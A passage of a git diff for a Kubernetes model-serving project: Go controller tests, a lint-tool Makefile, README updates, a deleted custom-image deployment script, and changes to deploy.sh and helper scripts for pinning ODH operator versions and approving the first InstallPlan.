+}
+
+func TestExternalModel_GetModelEndpoint_FromGateway(t *testing.T) {
+	model := newExternalModel("gpt-4o", "default", "openai", "api.openai.com")
+	gateway := newGatewayWithHostname("maas-default-gateway", "openshift-ingress", "maas.cluster.example.com")
+
+	r, _ := newTestReconciler(model, gateway)
+	r.GatewayName = "maas-default-gateway"
+	r.GatewayNamespace = "openshift-ingress"
+	handler := &externalModelHandler{r: r}
+	log := zap.New(zap.UseDevMode(true))
+
+	endpoint, err := handler.GetModelEndpoint(context.Background(), log, model)
+	if err != nil {
+		t.Fatalf("GetModelEndpoint: unexpected error: %v", err)
+	}
+	if endpoint != "https://maas.cluster.example.com/gpt-4o" {
+		t.Errorf("GetModelEndpoint = %q, want %q", endpoint, "https://maas.cluster.example.com/gpt-4o")
+	}
+}
+
+func TestExternalModel_CleanupOnDelete(t *testing.T) {
+	model := newExternalModel("gpt-4o", "default", "openai", "api.openai.com")
+
+	r, _ := newTestReconciler(model)
+	handler := &externalModelHandler{r: r}
+	log := zap.New(zap.UseDevMode(true))
+
+	err := handler.CleanupOnDelete(context.Background(), log, model)
+	if err != nil {
+		t.Fatalf("CleanupOnDelete: unexpected error: %v", err)
+	}
+}
+
+func TestExternalModel_CredentialRef(t *testing.T) {
+	externalModel := newExternalModelCR("gpt-4o", "default", "openai", "api.openai.com")
+	externalModel.Spec.CredentialRef = maasv1alpha1.CredentialReference{
+		Name: "openai-api-key",
+	}
+
+	if externalModel.Spec.CredentialRef.Name != "openai-api-key" {
+		t.Errorf("CredentialRef.Name = %q, want %q", externalModel.Spec.CredentialRef.Name, "openai-api-key")
+	}
+}
+
+func TestExternalModelRouteResolver(t *testing.T) {
+	model := newExternalModel("gpt-4o", "default", "openai", "api.openai.com")
+	resolver := externalModelRouteResolver{}
+
+	routeName, routeNS, err := resolver.HTTPRouteForModel(context.Background(), nil, model)
+	if err != nil {
+		t.Fatalf("HTTPRouteForModel: unexpected error: %v", err)
+	}
+	if routeName != "maas-model-gpt-4o" {
+		t.Errorf("routeName = %q, want %q", routeName, "maas-model-gpt-4o")
+	}
+	if routeNS != "default" {
+		t.Errorf("routeNS = %q, want %q", routeNS, "default")
+	}
+}
diff --git a/maas-controller/pkg/controller/maas/providers_llmisvc.go b/maas-controller/pkg/controller/maas/providers_llmisvc.go
index 6729ee699..3ac30d297 100644
--- a/maas-controller/pkg/controller/maas/providers_llmisvc.go
+++ b/maas-controller/pkg/controller/maas/providers_llmisvc.go
@@ -52,8 +52,8 @@ func (h *llmisvcHandler) validateLLMISvcHTTPRoute(ctx context.Context, log logr.
 		return fmt.Errorf("failed to list HTTPRoutes for LLMInferenceService %s: %w", model.Spec.ModelRef.Name, err)
 	}
 	if len(routeList.Items) == 0 {
-		log.Error(nil, "HTTPRoute not found for LLMInferenceService", "llmisvcName", model.Spec.ModelRef.Name, "namespace", routeNS)
-		return fmt.Errorf("HTTPRoute not found for LLMInferenceService %s in namespace %s", model.Spec.ModelRef.Name, routeNS)
+		log.V(1).Info("HTTPRoute not found for LLMInferenceService, will retry when created", "llmisvcName", model.Spec.ModelRef.Name, "namespace", routeNS)
+		return fmt.Errorf("%w: for LLMInferenceService %s in namespace %s", ErrHTTPRouteNotFound, model.Spec.ModelRef.Name, routeNS)
 	}
 	route := &routeList.Items[0]
 	routeName := route.Name
@@ -210,7 +210,7 @@ func (llmisvcRouteResolver) HTTPRouteForModel(ctx context.Context, c client.Read
 		return "", "", fmt.Errorf("failed to list HTTPRoutes for LLMInferenceService %s: %w", model.Spec.ModelRef.Name, err)
 	}
 	if len(routeList.Items) == 0 {
-		return "", "", fmt.Errorf("HTTPRoute not found for LLMInferenceService %s in namespace %s", model.Spec.ModelRef.Name, llmisvcNS)
+		return "", "", fmt.Errorf("%w: for LLMInferenceService %s in namespace %s", ErrHTTPRouteNotFound, model.Spec.ModelRef.Name, llmisvcNS)
 	}
 	route := &routeList.Items[0]
 	return route.Name, route.Namespace, nil
diff --git a/maas-controller/tools.mk b/maas-controller/tools.mk
new file mode 100644
index 000000000..3f1b3e881
--- /dev/null
+++ b/maas-controller/tools.mk
@@ -0,0 +1,30 @@
+PROJECT_DIR := $(shell dirname $(abspath $(lastword $(MAKEFILE_LIST))))
+LOCALBIN := $(PROJECT_DIR)/bin/tools
+
+$(LOCALBIN):
+	mkdir -p $(LOCALBIN)
+
+## Tools
+GOLANGCI_LINT ?= $(LOCALBIN)/golangci-lint
+
+GOLANGCI_LINT_VERSION ?= v2.6.2
+# Target the versioned binary so version bumps trigger reinstall
+$(GOLANGCI_LINT)-$(GOLANGCI_LINT_VERSION): $(LOCALBIN)
+	$(call go-install-tool,$(GOLANGCI_LINT),github.com/golangci/golangci-lint/v2/cmd/golangci-lint,$(GOLANGCI_LINT_VERSION))
+$(GOLANGCI_LINT): $(GOLANGCI_LINT)-$(GOLANGCI_LINT_VERSION)
+
+# go-install-tool will 'go install' any package with custom target and name of binary, if it doesn't exist
+# $1 - target path with name of binary (ideally with version)
+# $2 - package url which can be installed
+# $3 - specific version of package
+define go-install-tool
+@[ -f "$(1)-$(3)" ] || { \
+set -e; \
+package=$(2)@$(3) ;\
+echo "Downloading $${package}" ;\
+rm -f $(1) || true ;\
+GOBIN=$(LOCALBIN) go install $${package} ;\
+mv $(1) $(1)-$(3) ;\
+} ;\
+ln -sf $(1)-$(3) $(1)
+endef
diff --git a/scripts/README.md b/scripts/README.md
index 20834a0c8..f27082035 100644
--- a/scripts/README.md
+++ b/scripts/README.md
@@ -52,6 +52,7 @@ Automated deployment script for OpenShift clusters supporting both operator-base
 
 **Environment Variables:**
 - `MAAS_API_IMAGE` - Custom MaaS API container image (works in both operator and kustomize modes)
+- `MAAS_CONTROLLER_IMAGE` - Custom MaaS controller container image
 - `OPERATOR_CATALOG` - Custom operator catalog for PR testing
 - `OPERATOR_IMAGE` - Custom operator image for PR testing
 - `OPERATOR_TYPE` - Operator type (odh/rhoai)
@@ -146,6 +147,22 @@ Results:
 
 ---
 
+### `setup-authorino-tls.sh`
+Configures Authorino for TLS communication with maas-api. Run automatically by `deploy.sh` when `--enable-tls-backend` is set (default).
+
+**Usage:**
+```bash
+# Configure Authorino TLS (default: kuadrant-system)
+./scripts/setup-authorino-tls.sh
+
+# For RHCL, use rh-connectivity-link namespace
+AUTHORINO_NAMESPACE=rh-connectivity-link ./scripts/setup-authorino-tls.sh
+```
+
+**Note:** This script patches Authorino's service, CR, and deployment. Use `--disable-tls-backend` with `deploy.sh` to skip if you manage Authorino TLS separately.
+
+---
+
 ### `install-dependencies.sh`
 Installs individual dependencies (Kuadrant, ODH, etc.).
 
@@ -159,9 +176,13 @@ Installs individual dependencies (Kuadrant, ODH, etc.).
 ```
 
 **Options:**
+- `--all`: Install all components
 - `--kuadrant`: Install Kuadrant operator and dependencies
-- `--istio`: Install Istio
-- `--prometheus`: Install Prometheus
+- `--istio`: Install Istio service mesh
+- `--odh`: Install OpenDataHub operator (OpenShift only)
+- `--kserve`: Install KServe model serving platform
+- `--prometheus`: Install Prometheus operator
+- `--ocp`: Use OpenShift-specific handling
 
 ---
 
diff --git a/scripts/deploy-custom-maas-image.sh b/scripts/deploy-custom-maas-image.sh
deleted file mode 100755
index 25ba73b6c..000000000
--- a/scripts/deploy-custom-maas-image.sh
+++ /dev/null
@@ -1,315 +0,0 @@
-#!/usr/bin/env bash
-
-# deploy-custom-maas-image.sh
-# Deploys a custom maas-api image to an ODH cluster with all necessary fixes
-#
-# Usage:
-#   ./scripts/deploy-custom-maas-image.sh <custom-image-url>
-#
-# Example:
-#   ./scripts/deploy-custom-maas-image.sh quay.io/myuser/maas-api:my-tag
-
-set -euo pipefail
-
-# Colors for output
-RED='\033[0;31m'
-GREEN='\033[0;32m'
-YELLOW='\033[1;33m'
-BLUE='\033[0;34m'
-NC='\033[0m' # No Color
-
-# Configuration
-NAMESPACE="${NAMESPACE:-opendatahub}"
-TIMEOUT="${TIMEOUT:-300}"  # 5 minutes
-
-# Helper functions
-log_info() {
-    echo -e "${BLUE}[INFO]${NC} $*"
-}
-
-log_success() {
-    echo -e "${GREEN}[SUCCESS]${NC} $*"
-}
-
-log_warn() {
-    echo -e "${YELLOW}[WARN]${NC} $*"
-}
-
-log_error() {
-    echo -e "${RED}[ERROR]${NC} $*"
-}
-
-check_prerequisites() {
-    log_info "Checking prerequisites..."
-
-    local missing=()
-
-    command -v kubectl &>/dev/null || missing+=("kubectl")
-    command -v jq &>/dev/null || missing+=("jq")
-
-    if [[ ${#missing[@]} -gt 0 ]]; then
-        log_error "Missing required tools: ${missing[*]}"
-        exit 1
-    fi
-
-    # Check cluster connection
-    if ! kubectl cluster-info &>/dev/null; then
-        log_error "Cannot connect to Kubernetes cluster"
-        log_error "Please ensure you are logged in (oc login or kubectl config)"
-        exit 1
-    fi
-
-    log_success "Prerequisites check passed"
-}
-
-wait_for_deployment() {
-    local deployment=$1
-    local namespace=$2
-    local timeout=${3:-300}
-
-    log_info "Waiting for deployment/${deployment} in ${namespace} to be ready (timeout: ${timeout}s)..."
-
-    if kubectl rollout status deployment/"${deployment}" -n "${namespace}" --timeout="${timeout}s" &>/dev/null; then
-        log_success "Deployment ${deployment} is ready"
-        return 0
-    else
-        log_warn "Deployment ${deployment} did not become ready within timeout"
-        return 1
-    fi
-}
-
-check_deployment_exists() {
-    local deployment=$1
-    local namespace=$2
-
-    if kubectl get deployment "${deployment}" -n "${namespace}" &>/dev/null; then
-        return 0
-    else
-        return 1
-    fi
-}
-
-fix_rbac_permissions() {
-    log_info "Applying RBAC permissions fix..."
-
-    # Check if permissions already exist
-    if kubectl get clusterrole maas-api -o json | jq -e '.rules[] | select(.apiGroups[] == "maas.opendatahub.io")' &>/dev/null; then
-        log_info "RBAC permissions already include maas.opendatahub.io - skipping"
-        return 0
-    fi
-
-    kubectl patch clusterrole maas-api --type='json' -p='[
-      {
-        "op": "add",
-        "path": "/rules/-",
-        "value": {
-          "apiGroups": ["maas.opendatahub.io"],
-          "resources": ["maasmodels", "maassubscriptions"],
-          "verbs": ["get", "list", "watch"]
-        }
-      }
-    ]' || {
-        log_error "Failed to patch ClusterRole"
-        return 1
-    }
-
-    log_success "RBAC permissions fixed"
-}
-
-disable_operator_reconciliation() {
-    log_info "Disabling operator reconciliation (scaling to 0)..."
-
-    if ! kubectl get deployment opendatahub-operator-controller-manager -n "${NAMESPACE}" &>/dev/null; then
-        log_warn "ODH operator deployment not found - skipping operator scaling"
-        return 0
-    fi
-
-    kubectl scale deployment opendatahub-operator-controller-manager \
-      -n "${NAMESPACE}" --replicas=0 || {
-        log_error "Failed to scale operator to 0"
-        return 1
-    }
-
-    # Wait for operator to scale down
-    sleep 5
-
-    log_success "Operator reconciliation disabled"
-}
-
-update_custom_image() {
-    local custom_image=$1
-
-    log_info "Updating maas-api deployment with custom image: ${custom_image}"
-
-    kubectl patch deployment maas-api -n "${NAMESPACE}" --type='json' -p='[
-      {
-        "op": "replace",
-        "path": "/spec/template/spec/containers/0/image",
-        "value": "'"${custom_image}"'"
-      }
-    ]' || {
-        log_error "Failed to update image"
-        return 1
-    }
-
-    log_success "Custom image configured"
-}
-
-verify_deployment() {
-    log_info "Verifying deployment..."
-
-    # Wait for rollout
-    if ! wait_for_deployment "maas-api" "${NAMESPACE}" "${TIMEOUT}"; then
-        log_error "Deployment did not become ready"
-        log_info "Checking pod status..."
-        kubectl get pods -n "${NAMESPACE}" -l app.kubernetes.io/name=maas-api
-        log_info "Recent logs:"
-        kubectl logs -n "${NAMESPACE}" deployment/maas-api --tail=50 || true
-        return 1
-    fi
-
-    # Check image
-    local actual_image
-    actual_image=$(kubectl get deployment maas-api -n "${NAMESPACE}" \
-      -o jsonpath='{.spec.template.spec.containers[0].image}')
-    log_info "Running image: ${actual_image}"
-
-    # Check pod status
-    local pod_status
-    pod_status=$(kubectl get pods -n "${NAMESPACE}" -l app.kubernetes.io/name=maas-api \
-      -o jsonpath='{.items[0].status.phase}' 2>/dev/null || echo "Unknown")
-    log_info "Pod status: ${pod_status}"
-
-    if [[ "${pod_status}" == "Running" ]]; then
-        log_success "Pod is running"
-
-        # Check logs for success indicators
-        log_info "Checking logs for database connection..."
-        if kubectl logs -n "${NAMESPACE}" deployment/maas-api --tail=100 | \
-           grep -q "Connected to PostgreSQL database"; then
-            log_success "PostgreSQL connection established"
-        else
-            log_warn "Could not verify PostgreSQL connection in logs"
-        fi
-
-        if kubectl logs -n "${NAMESPACE}" deployment/maas-api --tail=100 | \
-           grep -q "Server starting"; then
-            log_success "Server started successfully"
-        else
-            log_warn "Could not verify server startup in logs"
-        fi
-
-        return 0
-    else
-        log_error "Pod is not running (status: ${pod_status})"
-        return 1
-    fi
-}
-
-show_next_steps() {
-    cat <<EOF
-
-${GREEN}================================${NC}
-${GREEN}Deployment Successful!${NC}
-${GREEN}================================${NC}
-
-The custom maas-api image has been deployed successfully.
-
-${BLUE}Verification Commands:${NC}
-
-  # Check pod status
-  kubectl get pods -n ${NAMESPACE} -l app.kubernetes.io/name=maas-api
-
-  # View logs
-  kubectl logs -n ${NAMESPACE} deployment/maas-api --tail=100 -f
-
-  # Check image
-  kubectl get deployment maas-api -n ${NAMESPACE} \\
-    -o jsonpath='{.spec.template.spec.containers[0].image}'
-
-${BLUE}Testing the API:${NC}
-
-  # Get a JWT token from your cluster
-  TOKEN=\$(oc whoami -t)
-
-  # Test the new POST /v1/api-keys/search endpoint
-  kubectl exec -n ${NAMESPACE} deployment/maas-api -- \\
-    curl -k -s https://localhost:8443/v1/api-keys/search \\
-    -H "Authorization: Bearer \${TOKEN}" \\
-    -H "Content-Type: application/json" \\
-    -d '{
-      "filters": {"status": ["active"]},
-      "sort": {"by": "created_at", "order": "desc"},
-      "pagination": {"limit": 10, "offset": 0}
-    }'
-
-${YELLOW}Note:${NC} The ODH operator has been scaled to 0 replicas to prevent
-reconciliation. To re-enable it:
-
-  kubectl scale deployment opendatahub-operator-controller-manager \\
-    -n ${NAMESPACE} --replicas=1
-
-${YELLOW}Warning:${NC} Re-enabling the operator may revert your custom image.
-
-EOF
-}
-
-main() {
-    if [[ $# -lt 1 ]]; then
-        cat <<EOF
-${RED}Error: Missing required argument${NC}
-
-Usage: $0 <custom-image-url>
-
-Example:
-  $0 quay.io/myuser/maas-api:my-tag
-
-This script automates deployment of a custom maas-api image by:
-  1. Fixing RBAC permissions for maasmodels/maassubscriptions
-  2. Disabling operator reconciliation
-  3. Updating to custom image
-  4. Verifying deployment health
-
-For more details, see: docs/CUSTOM_IMAGE_DEPLOYMENT.md
-EOF
-        exit 1
-    fi
-
-    local custom_image=$1
-
-    echo ""
-    log_info "========================================="
-    log_info "  Custom MaaS API Image Deployment"
-    log_info "========================================="
-    log_info "Image: ${custom_image}"
-    log_info "Namespace: ${NAMESPACE}"
-    log_info "========================================="
-    echo ""
-
-    # Run checks and fixes
-    check_prerequisites
-
-    # Check if maas-api deployment exists
-    if ! check_deployment_exists "maas-api" "${NAMESPACE}"; then
-        log_error "maas-api deployment not found in namespace ${NAMESPACE}"
-        log_error "Please deploy ODH first using: ./scripts/deploy.sh"
-        exit 1
-    fi
-
-    # Apply fixes in order
-    fix_rbac_permissions || exit 1
-    disable_operator_reconciliation || exit 1
-    update_custom_image "${custom_image}" || exit 1
-
-    # Verify
-    if verify_deployment; then
-        show_next_steps
-        exit 0
-    else
-        log_error "Deployment verification failed"
-        log_error "Please check logs and pod status manually"
-        exit 1
-    fi
-}
-
-main "$@"
diff --git a/scripts/deploy.sh b/scripts/deploy.sh
index aad9e48fc..020e35bad 100755
--- a/scripts/deploy.sh
+++ b/scripts/deploy.sh
@@ -30,6 +30,7 @@
 #   MAAS_CONTROLLER_IMAGE     Custom MaaS controller container image
 #   OPERATOR_TYPE             Operator type (rhoai/odh)
 #   LOG_LEVEL                 Logging verbosity (DEBUG, INFO, WARN, ERROR)
+#   KUSTOMIZE_FORCE_CONFLICTS When true, use --force-conflicts on kubectl apply in kustomize mode
 #
 # EXAMPLES:
 #   # Deploy ODH (default, uses kuadrant policy engine)
@@ -82,8 +83,11 @@ DRY_RUN="${DRY_RUN:-false}"
 OPERATOR_CATALOG="${OPERATOR_CATALOG:-}"
 OPERATOR_IMAGE="${OPERATOR_IMAGE:-}"
 OPERATOR_CHANNEL="${OPERATOR_CHANNEL:-}"
+OPERATOR_STARTING_CSV="${OPERATOR_STARTING_CSV:-}"
+OPERATOR_INSTALL_PLAN_APPROVAL="${OPERATOR_INSTALL_PLAN_APPROVAL:-}"
 MAAS_API_IMAGE="${MAAS_API_IMAGE:-}"
 MAAS_CONTROLLER_IMAGE="${MAAS_CONTROLLER_IMAGE:-}"
+KUSTOMIZE_FORCE_CONFLICTS="${KUSTOMIZE_FORCE_CONFLICTS:-false}"
 
 #──────────────────────────────────────────────────────────────
 # HELP TEXT
@@ -153,9 +157,12 @@ ENVIRONMENT VARIABLES:
   MAAS_API_IMAGE            Custom MaaS API container image
   MAAS_CONTROLLER_IMAGE     Custom MaaS controller container image
   OPERATOR_CATALOG          Custom operator catalog
-  OPERATOR_IMAGE        Custom operator image
-  OPERATOR_TYPE         Operator type (rhoai/odh)
-  LOG_LEVEL             Logging verbosity (DEBUG, INFO, WARN, ERROR)
+  OPERATOR_IMAGE            Custom operator image
+  OPERATOR_STARTING_CSV     ODH Subscription startingCSV (default: opendatahub-operator.v3.4.0-ea.1; "-" to omit)
+  OPERATOR_INSTALL_PLAN_APPROVAL  ODH Subscription OLM approval (default: Manual — no auto-upgrades; first InstallPlan is auto-approved by the script)
+  OPERATOR_TYPE             Operator type (rhoai/odh)
+  LOG_LEVEL                 Logging verbosity (DEBUG, INFO, WARN, ERROR)
+  KUSTOMIZE_FORCE_CONFLICTS When true, pass --force-conflicts to kubectl apply in kustomize mode (default: false)
 
 EXAMPLES:
   # Deploy ODH (default, uses kuadrant policy engine)
@@ -567,18 +574,29 @@ deploy_via_kustomize() {
     kubectl create namespace "$NAMESPACE"
   fi
 
+  # Note: The subscription namespace (default: models-as-a-service) is automatically
+  # created by maas-controller when it starts (see maas-controller/cmd/manager/main.go).
+  # We only set the variable here for use in manifest patching below.
+  local subscription_namespace="${MAAS_SUBSCRIPTION_NAMESPACE:-models-as-a-service}"
+
   # Deploy PostgreSQL for API key storage (requires namespace to exist)
   deploy_postgresql
 
   log_info "Applying kustomize manifests..."
-  kubectl apply --server-side=true -f <(kustomize build "$overlay")
+  # Patch the maas-api URL placeholder with actual namespace
+  # Patch MAAS_SUBSCRIPTION_NAMESPACE env var with the configured subscription namespace
+  kubectl apply --server-side=true --force-conflicts="$KUSTOMIZE_FORCE_CONFLICTS" -f <(
+    kustomize build "$overlay" | \
+    sed "s/maas-api\.placehold\.svc/maas-api.$NAMESPACE.svc/g" | \
+    perl -pe 'BEGIN{undef $/;} s/(name: MAAS_SUBSCRIPTION_NAMESPACE\n\s+value: ")[^"]*"/${1}'"$subscription_namespace"'"/smg'
+  )
 
   # Apply gateway policies separately so they stay in openshift-ingress (overlay
   # namespace would otherwise overwrite them to $NAMESPACE)
   local policies_dir="$project_root/deployment/base/maas-controller/policies"
   if [[ -d "$policies_dir" ]]; then
     log_info "Applying gateway policies (openshift-ingress)..."
-    kubectl apply --server-side=true -f <(kustomize build "$policies_dir")
+    kubectl apply --server-side=true --force-conflicts="$KUSTOMIZE_FORCE_CONFLICTS" -f <(kustomize build "$policies_dir")
   fi
 
   # Configure TLS backend (if enabled)
@@ -597,139 +615,7 @@ deploy_via_kustomize() {
 #──────────────────────────────────────────────────────────────
 
 deploy_postgresql() {
-  log_info "Deploying PostgreSQL for API key storage..."
-
-  # Check if PostgreSQL already exists
-  if kubectl get deployment postgres -n "$NAMESPACE" &>/dev/null; then
-    log_info "  PostgreSQL already deployed in namespace $NAMESPACE"
-    log_info "  Service: postgres:5432"
-    log_info "  Secret: maas-db-config (contains DB_CONNECTION_URL)"
-    return 0
-  fi
-
-  # PostgreSQL configuration (POC-grade, not for production)
-  local POSTGRES_USER="${POSTGRES_USER:-maas}"
-  local POSTGRES_DB="${POSTGRES_DB:-maas}"
-
-  # Generate random password if not provided
-  local POSTGRES_PASSWORD="${POSTGRES_PASSWORD:-}"
-  if [[ -z "$POSTGRES_PASSWORD" ]]; then
-    POSTGRES_PASSWORD="$(openssl rand -base64 32 | tr -d '/+=' | cut -c1-32)"
-    log_info "  Generated random PostgreSQL password (stored in secret postgres-creds)"
-  fi
-
-  log_info "  Creating PostgreSQL deployment..."
-  log_info "  ⚠️  Using POC configuration (ephemeral storage)"
-
-  # Deploy PostgreSQL resources
-  kubectl apply -n "$NAMESPACE" -f - <<EOF
-apiVersion: v1
-kind: Secret
-metadata:
-  name: postgres-creds
-  labels:
-    app: postgres
-    purpose: poc
-stringData:
-  POSTGRES_USER: "${POSTGRES_USER}"
-  POSTGRES_PASSWORD: "${POSTGRES_PASSWORD}"
-  POSTGRES_DB: "${POSTGRES_DB}"
----
-apiVersion: apps/v1
-kind: Deployment
-metadata:
-  name: postgres
-  labels:
-    app: postgres
-    purpose: poc
-spec:
-  replicas: 1
-  selector:
-    matchLabels:
-      app: postgres
-  template:
-    metadata:
-      labels:
-        app: postgres
-    spec:
-      containers:
-      - name: postgres
-        image: registry.redhat.io/rhel9/postgresql-15:latest
-        env:
-        - name: POSTGRESQL_USER
-          valueFrom:
-            secretKeyRef:
-              name: postgres-creds
-              key: POSTGRES_USER
-        - name: POSTGRESQL_PASSWORD
-          valueFrom:
-            secretKeyRef:
-              name: postgres-creds
-              key: POSTGRES_PASSWORD
-        - name: POSTGRESQL_DATABASE
-          valueFrom:
-            secretKeyRef:
-              name: postgres-creds
-              key: POSTGRES_DB
-        ports:
-        - containerPort: 5432
-        volumeMounts:
-        - name: data
-          mountPath: /var/lib/pgsql/data
-        resources:
-          requests:
-            memory: "256Mi"
-            cpu: "100m"
-          limits:
-            memory: "512Mi"
-            cpu: "500m"
-        readinessProbe:
-          exec:
-            command: ["/usr/libexec/check-container"]
-          initialDelaySeconds: 5
-          periodSeconds: 5
-      volumes:
-      - name: data
-        emptyDir: {}
----
-apiVersion: v1
-kind: Service
-metadata:
-  name: postgres
-  labels:
-    app: postgres
-    purpose: poc
-spec:
-  selector:
-    app: postgres
-  ports:
-  - port: 5432
-    targetPort: 5432
----
-apiVersion: v1
-kind: Secret
-metadata:
-  name: maas-db-config
-  labels:
-    app: maas-api
-    purpose: poc
-stringData:
-  DB_CONNECTION_URL: "postgresql://${POSTGRES_USER}:${POSTGRES_PASSWORD}@postgres:5432/${POSTGRES_DB}?sslmode=disable"
-EOF
-
-  log_info "  Waiting for PostgreSQL to be ready..."
-  if ! kubectl wait -n "$NAMESPACE" --for=condition=available deployment/postgres --timeout=120s; then
-    log_error "PostgreSQL deployment failed to become ready"
-    return 1
-  fi
-
-  log_info "  PostgreSQL deployed successfully"
-  log_info "  Database: $POSTGRES_DB"
-  log_info "  User: $POSTGRES_USER"
-  log_info "  Secret: maas-db-config (contains DB_CONNECTION_URL)"
-  log_info ""
-  log_info "  ⚠️  For production, use AWS RDS, Crunchy Operator, or Azure Database"
-  log_info "  Note: Schema migrations run automatically when maas-api starts"
+  NAMESPACE="$NAMESPACE" "${SCRIPT_DIR}/setup-database.sh"
 }
 
 #──────────────────────────────────────────────────────────────
@@ -910,7 +796,9 @@ install_policy_engine() {
         "redhat-operators" \
         "stable" \
         "" \
-        "AllNamespaces"
+        "AllNamespaces" \
+        "" \
+        ""
 
       # Patch RHCL CSV to recognize OpenShift Gateway controller
       patch_kuadrant_csv_for_gateway "rh-connectivity-link" "rhcl-operator"
@@ -969,7 +857,8 @@ EOF
         "stable" \
         "" \
         "AllNamespaces" \
-        "$kuadrant_ns"  # source_namespace - must match CatalogSource namespace
+        "$kuadrant_ns" \
+        ""
 
       # Patch Kuadrant CSV to recognize OpenShift Gateway controller
       patch_kuadrant_csv_for_gateway "$kuadrant_ns" "kuadrant-operator"
@@ -1052,7 +941,9 @@ install_primary_operator() {
         "$catalog_source" \
         "$channel" \
         "" \
-        "AllNamespaces"
+        "AllNamespaces" \
+        "" \
+        ""
 
       # Patch CSV with custom operator image if specified
       if [[ -n "$OPERATOR_IMAGE" ]]; then
@@ -1062,27 +953,35 @@ install_primary_operator() {
 
     odh)
       # Support custom catalog for ODH snapshot/development builds
-      # This allows testing with pre-release ODH versions (e.g., v3.3.0-snapshot)
+      # This allows testing with pre-release ODH versions (e.g., v3.4.0-ea snapshots)
       if [[ -n "$OPERATOR_CATALOG" ]]; then
         log_info "Using custom ODH catalog: $OPERATOR_CATALOG"
         create_custom_catalogsource "odh-custom-catalog" "openshift-marketplace" "$OPERATOR_CATALOG"
         catalog_source="odh-custom-catalog"
-        # Custom catalogs typically use 'fast' channel
-        channel="${OPERATOR_CHANNEL:-fast}"
+        channel="${OPERATOR_CHANNEL:-fast-3}"
       else
         catalog_source="community-operators"
-        # Use 'fast-3' channel for released versions
         channel="${OPERATOR_CHANNEL:-fast-3}"
       fi
 
+      # Pin to ODH 3.4 EA1 unless overridden (omit with OPERATOR_STARTING_CSV=-)
+      local odh_starting_csv="${OPERATOR_STARTING_CSV:-opendatahub-operator.v3.4.0-ea.1}"
+      [[ "$odh_starting_csv" == "-" ]] && odh_starting_csv=""
+
+      # Manual = no auto-upgrades; install_olm_operator auto-approves the first InstallPlan only
+      local odh_plan_approval="${OPERATOR_INSTALL_PLAN_APPROVAL:-Manual}"
+      [[ "$odh_plan_approval" == "-" ]] && odh_plan_approval=""
+
       log_info "Installing ODH operator..."
       install_olm_operator \
         "opendatahub-operator" \
         "$NAMESPACE" \
         "$catalog_source" \
         "$channel" \
-        "" \
-        "AllNamespaces"
+        "$odh_starting_csv" \
+        "AllNamespaces" \
+        "openshift-marketplace" \
+        "$odh_plan_approval"
 
       # Patch CSV with custom operator image if specified
       if [[ -n "$OPERATOR_IMAGE" ]]; then
@@ -1580,12 +1479,6 @@ EOF
 configure_tls_backend() {
   log_info "Configuring TLS backend for Authorino and MaaS API..."
 
-  local project_root
-  project_root="$(find_project_root)" || {
-    log_warn "Could not find project root, skipping TLS backend configuration"
-    return 0
-  }
-
   # Determine Authorino namespace based on rate limiter
   local authorino_namespace
   case "$POLICY_ENGINE" in
@@ -1608,7 +1501,7 @@ configure_tls_backend() {
   }
 
   # Call TLS configuration script
-  local tls_script="${project_root}/deployment/overlays/tls-backend/configure-authorino-tls.sh"
+  local tls_script="${SCRIPT_DIR}/setup-authorino-tls.sh"
   if [[ ! -f "$tls_script" ]]; then
     log_warn "TLS configuration script not found at $tls_script, skipping"
     return 0
diff --git a/scripts/deployment-helpers.sh b/scripts/deployment-helpers.sh
index 44d0c49b6..ac7181e33 100755
--- a/scripts/deployment-helpers.sh
+++ b/scripts/deployment-helpers.sh
@@ -197,6 +197,46 @@ waitsubscriptioninstalled() {
   fi
 }
 
+# approve_initial_installplan_if_manual namespace subscription_name [timeout_seconds]
+#   When installPlanApproval is Manual, OLM creates an InstallPlan with spec.approved=false.
+#   Approve that InstallPlan once so the first install completes without human action.
+#   Later upgrade InstallPlans remain unapproved until someone approves them manually.
+approve_initial_installplan_if_manual() {
+  local namespace=${1?namespace is required}; shift
+  local subscription_name=${1?subscription name is required}; shift
+  local timeout=${1:-180}
+  local elapsed=0
+  local interval=3
+
+  while [[ $elapsed -lt $timeout ]]; do
+    local ip_name
+    ip_name=$(kubectl get subscription.operators.coreos.com -n "$namespace" "$subscription_name" -o jsonpath='{.status.installPlanRef.name}' 2>/dev/null || true)
+    if [[ -n "$ip_name" ]]; then
+      local approved
+      approved=$(kubectl get installplan "$ip_name" -n "$namespace" -o jsonpath='{.spec.approved}' 2>/dev/null || echo "")
+      if [[ "$approved" == "false" ]]; then
+        log_info "Approving initial InstallPlan $ip_name (Manual subscription)"
+        kubectl patch installplan "$ip_name" -n "$namespace" --type=merge -p '{"spec":{"approved":true}}' || {
+          log_warn "Could not approve InstallPlan $ip_name"
+        }
+      fi
+      return 0
+    fi
+    sleep "$interval"
+    elapsed=$((elapsed + interval))
+  done
+
+  # Fallback: single pending InstallPlan in namespace (e.g. ref not yet on Subscription)
+  local fallback_ip
+  fallback_ip=$(kubectl get installplan -n "$namespace" -o json 2>/dev/null | jq -r '.items[] | select((.spec.approved // false) == false) | .metadata.name' 2>/dev/null | head -1)
+  if [[ -n "$fallback_ip" ]]; then
+    log_info "Approving pending InstallPlan $fallback_ip (Manual subscription, fallback)"
+    kubectl patch installplan "$fallback_ip" -n "$namespace" --type=merge -p '{"spec":{"approved":true}}' || true
+  else
+    log_warn "No InstallPlan to auto-approve within ${timeout}s; if install stalls, approve the InstallPlan manually"
+  fi
+}
+
 # checksubscriptionexists catalog_namespace catalog_name operator_name
 #   Checks if a subscription exists for the given operator from the specified catalog.
 #   Returns the count of matching subscriptions (0 if none found).
@@ -264,7 +304,7 @@ should_install_operator() {
   return 0
 }
 
-# install_olm_operator operator_name namespace catalog_source channel starting_csv operatorgroup_target source_namespace
+# install_olm_operator operator_name namespace catalog_source channel starting_csv operatorgroup_target source_namespace install_plan_approval
 #   Generic function to install an OLM operator.
 #
 # Arguments:
@@ -275,6 +315,8 @@ should_install_operator() {
 #   starting_csv - Starting CSV (optional, can be empty)
 #   operatorgroup_target - Target namespace for OperatorGroup (optional, uses namespace if empty)
 #   source_namespace - Catalog source namespace (optional, defaults to openshift-marketplace)
+#   install_plan_approval - Automatic or Manual (optional, empty = omit). Manual blocks automatic
+#     upgrades; this script auto-approves only the first InstallPlan so initial install still completes.
 install_olm_operator() {
   local operator_name=${1?operator name is required}; shift
   local namespace=${1?namespace is required}; shift
@@ -283,6 +325,7 @@ install_olm_operator() {
   local starting_csv=${1:-}; shift || true
   local operatorgroup_target=${1:-}; shift || true
